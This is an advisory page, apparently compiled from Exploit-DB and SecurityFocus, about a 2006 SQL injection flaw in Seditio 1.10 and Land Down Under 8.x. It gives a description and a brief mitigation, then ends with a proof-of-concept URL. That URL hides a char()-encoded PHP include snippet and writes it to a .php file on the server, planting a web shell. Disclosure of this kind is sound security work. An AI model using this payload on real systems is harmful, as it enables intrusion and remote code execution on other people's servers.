Seditio and Land Down Under SQL Injection Vulnerability

vendor:

Seditio and Land Down Under

by:

SecurityFocus

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Seditio and Land Down Under

Affected Version From: Seditio version 1.10 and Land Down Under versions 8.x

Affected Version To: Seditio version 1.10 and Land Down Under versions 8.x

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Seditio and Land Down Under SQL Injection Vulnerability

Seditio and Land Down Under are prone to an SQL-injection vulnerability because the applications fail to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the applications, access or modify data, or exploit vulnerabilities in the underlying database implementation.

Mitigation:

Input validation should be used to ensure that untrusted input is not used in SQL queries.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/21366/info

Seditio and Land Down Under are prone to an SQL-injection vulnerability because the applications fail to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the applications, access or modify data, or exploit vulnerabilities in the underlying database implementation.

This issue affects Seditio version 1.10 and Land Down Under versions 8.x; other versions may also be vulnerable.

http://www.example.com/polls.php?id='union%20select%200,0,0,0,char(60,63,105,110,99,108,117,100,101,40,36,99,109,100,41,59,63,62)%20from%20sed_users%20INTO%20OUTFILE%20'[path]/.php'/*